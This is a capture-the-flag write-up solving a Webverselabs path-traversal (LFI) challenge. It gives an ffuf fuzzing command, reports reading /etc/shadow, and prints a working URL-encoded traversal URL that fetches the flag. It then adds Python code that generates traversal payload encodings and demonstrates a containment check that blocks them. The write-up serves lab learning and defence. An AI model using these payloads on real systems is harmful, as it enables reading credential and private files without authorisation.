Webverselabs Traverse Challenge LFI
Scenario :
Traverse is a four-person developer-tools startup out of Berlin that launched their API product in 2023 and rewrote the docs portal last month after a Show-HN thread complained the old one felt sluggish. The new version was put together by the founding engineer in a single caffeinated weekend, modelled on a tutorial blog post they half-read on the plane home from a conference. It looks the part — they have not yet had time to revisit how it actually serves pages.
Solution :
This one was pretty easy. On visiting the web app, we find a parameter (name, as the request below shows) that is passed in every request.
We can fuzz it with ffuf and an LFI wordlist from SecLists (I prefer the Jhaddix list), then filter the output so that only responses with a 200 status remain.
We then test the surviving payloads by hand to check whether they actually return file contents or just a generic page.
Perfect, we can even read /etc/shadow, which in a normal configuration means the web process runs with enough privilege to read root-owned files. Now let's find the flag. It is usually in the filesystem root as /flag.txt, so take one of the working payloads and append flag.txt to it:
https://eeda1f1e-4327-traverse-258cd.challenges.webverselabs-pro.com/page?name=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/flag.txt
It works! That's all for this challenge.
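As an added example (this is not code from the writeup, from Webverselabs, or from Traverse's real docs portal), the block below models the kind of tutorial-style page handler the scenario describes, runs the writeup's %2e%2e/ payload against it, and shows the path-containment check that stops it. The docs directory /srv/docs, the handler shape and the fuzzing step itself are assumptions: the challenge's server code is not on the page, and the ffuf run it replaces is simply ffuf -u 'https://<host>/page?name=FUZZ' -w SecLists/Fuzzing/LFI/LFI-Jhaddix.txt -mc 200 against the live target.

```python
"""Added example, not code from the Traverse writeup: a model of the "page?name=" file
handler, the writeup's traversal payload run against it, and a hardened version with a
path-containment check. DOCS_ROOT and the handler shape are assumptions; the challenge's
real server code is not shown on the page."""
import os
import urllib.parse

DOCS_ROOT = "/srv/docs"  # assumed location of the docs portal's page files

# Ten URL-encoded "../" segments followed by flag.txt, as used in the writeup's final request
WRITEUP_PAYLOAD = "/" + "%2e%2e/" * 10 + "flag.txt"


def traversal_payloads(target: str, depth: int = 10) -> list:
    """Build the common encodings of a depth-N "../" prefix, the way an LFI wordlist does.
    The single-encoded forms decode in one pass; the double-encoded one only traverses if
    the server decodes twice, so it is worth fuzzing as a separate case."""
    segments = {
        "plain": "../",
        "dot-encoded": "%2e%2e/",
        "slash-encoded": "..%2f",
        "fully-encoded": "%2e%2e%2f",
        "double-encoded": "%252e%252e%252f",
    }
    return [seg * depth + target for seg in segments.values()]


def vulnerable_resolve(name: str) -> str:
    """Tutorial-style handler: decode the query parameter once and glue it under DOCS_ROOT.
    normpath then collapses every "../", so enough of them walk out of DOCS_ROOT entirely
    (normpath never climbs above "/", which is why ten segments are plenty)."""
    decoded = urllib.parse.unquote(name)
    return os.path.normpath(DOCS_ROOT + "/" + decoded)


def escapes_root(name: str) -> bool:
    """Containment check: resolve the requested name under the real docs root and report
    whether the result lies outside it. realpath also follows symlinks, so a link placed
    inside the docs directory cannot be used to point back out of it."""
    decoded = urllib.parse.unquote(name)
    root = os.path.realpath(DOCS_ROOT)
    candidate = os.path.realpath(os.path.join(root, decoded.lstrip("/")))
    return os.path.commonpath([root, candidate]) != root


def safe_resolve(name: str) -> str:
    """Hardened handler: same resolution, but refuse anything that escapes DOCS_ROOT."""
    if escapes_root(name):
        raise PermissionError(f"path escapes docs root: {name!r}")
    decoded = urllib.parse.unquote(name)
    return os.path.realpath(os.path.join(os.path.realpath(DOCS_ROOT), decoded.lstrip("/")))


if __name__ == "__main__":
    print("vulnerable handler resolves the writeup payload to:", vulnerable_resolve(WRITEUP_PAYLOAD))
    for payload in traversal_payloads("flag.txt"):
        print(f"{payload[:24]:<24} -> vulnerable={vulnerable_resolve(payload)}  blocked={escapes_root(payload)}")
    print("hardened handler on a legitimate page:", safe_resolve("intro.html"))
```

Note what the double-encoded entry shows: a server that decodes the parameter only once sees literal %2e%2e%2f text, so that payload stays inside the docs root under both handlers. It only becomes a traversal when a framework or proxy decodes a second time, which is exactly why the wordlist carries it alongside the single-encoded forms.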